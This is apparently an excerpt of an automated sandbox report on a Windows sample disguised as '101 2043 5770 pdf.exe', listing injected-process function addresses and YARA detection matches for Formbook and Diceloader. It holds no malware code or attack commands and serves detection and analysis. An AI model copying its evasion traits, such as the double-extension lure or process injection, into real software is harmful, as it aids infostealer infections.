Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0361739A	9_2_0361739A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03670274	9_2_03670274
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036712ED	9_2_036712ED
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035EB2C0	9_2_035EB2C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036502C0	9_2_036502C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D52A0	9_2_035D52A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0369B16B	9_2_0369B16B
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0360516C	9_2_0360516C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035BF172	9_2_035BF172
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03658158	9_2_03658158
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035C0100	9_2_035C0100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0366A118	9_2_0366A118
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036881CC	9_2_036881CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036901AA	9_2_036901AA
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035DB1B0	9_2_035DB1B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036870E9	9_2_036870E9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368F0E0	9_2_0368F0E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D70C0	9_2_035D70C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0367F0CC	9_2_0367F0CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035F4750	9_2_035F4750
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D0770	9_2_035D0770
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035CC7C0	9_2_035CC7C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368F7B0	9_2_0368F7B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_036816CC	9_2_036816CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035EC6E0	9_2_035EC6E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03687571	9_2_03687571
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D0535	9_2_035D0535
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0366D5B0	9_2_0366D5B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03690591	9_2_03690591
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03682446	9_2_03682446
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035C1460	9_2_035C1460
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368F43F	9_2_0368F43F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0367E4F6	9_2_0367E4F6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368FB76	9_2_0368FB76
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368AB40	9_2_0368AB40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03645BF0	9_2_03645BF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0360DBF9	9_2_0360DBF9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03686BD7	9_2_03686BD7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035EFB80	9_2_035EFB80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03643A6C	9_2_03643A6C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368FA49	9_2_0368FA49
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03687A46	9_2_03687A46
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0367DAC6	9_2_0367DAC6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03615AA0	9_2_03615AA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0366DAAC	9_2_0366DAAC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035CEA80	9_2_035CEA80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D9950	9_2_035D9950
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035EB950	9_2_035EB950
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035E6962	9_2_035E6962
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0369A9A6	9_2_0369A9A6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D29A0	9_2_035D29A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D2840	9_2_035D2840
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035DA840	9_2_035DA840
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0363D800	9_2_0363D800
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035FE8F0	9_2_035FE8F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D38E0	9_2_035D38E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035B68B8	9_2_035B68B8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03644F40	9_2_03644F40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03612F28	9_2_03612F28
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368FF09	9_2_0368FF09
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035F0F30	9_2_035F0F30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035C2FC8	9_2_035C2FC8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035DCFE0	9_2_035DCFE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0364EFA0	9_2_0364EFA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D1F92	9_2_035D1F92
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368FFB1	9_2_0368FFB1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D0E59	9_2_035D0E59
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368EE26	9_2_0368EE26
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368EEDB	9_2_0368EEDB
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035E2E90	9_2_035E2E90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D9EB0	9_2_035D9EB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368CE93	9_2_0368CE93
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03687D73	9_2_03687D73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D3D40	9_2_035D3D40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03681D5A	9_2_03681D5A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035DAD00	9_2_035DAD00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035EFDC0	9_2_035EFDC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035CADE0	9_2_035CADE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035E8DBF	9_2_035E8DBF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03649C32	9_2_03649C32
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035D0C00	9_2_035D0C00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0368FCF2	9_2_0368FCF2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_035C0CF2	9_2_035C0CF2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03670CB5	9_2_03670CB5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5E5DE	9_2_00C5E5DE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C42D90	9_2_00C42D90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5DD0E	9_2_00C5DD0E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C5D6C0	9_2_00C5D6C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C49E5D	9_2_00C49E5D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C49E60	9_2_00C49E60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00C42FB0	9_2_00C42FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0398A036	9_2_0398A036
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03985B30	9_2_03985B30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03985B32	9_2_03985B32
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0398B232	9_2_0398B232
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03988912	9_2_03988912
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03981082	9_2_03981082
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_0398E5CD	9_2_0398E5CD
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_03982D02	9_2_03982D02

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: String function: 00007FF7D785C9D0 appears 63 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 03617E54 appears 96 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 035BB970 appears 268 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 0364F290 appears 105 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 03605130 appears 36 times
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: String function: 0363EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 059B7E54 appears 98 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 059EF290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 0595B970 appears 272 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 059DEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: String function: 059A5130 appears 36 times

PE / OLE file has an invalid certificate

Source: 101 2043 5770 pdf.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: 101 2043 5770 pdf.exe	Binary or memory string: OriginalFilename vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000000.00000002.2126845759.00007FF7D7A76000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2294564092.00007FF6803A6000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2276739444.000002653FC55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.E1 vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000019.00000000.2321404390.00007FF6803A6000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe, 00000019.00000002.2346157181.000001EC01830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe
Source: 101 2043 5770 pdf.exe.0.dr	Binary or memory string: OriginalFilenameTimeSeparatorCR.dll@ vs 101 2043 5770 pdf.exe

Yara signature match

Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
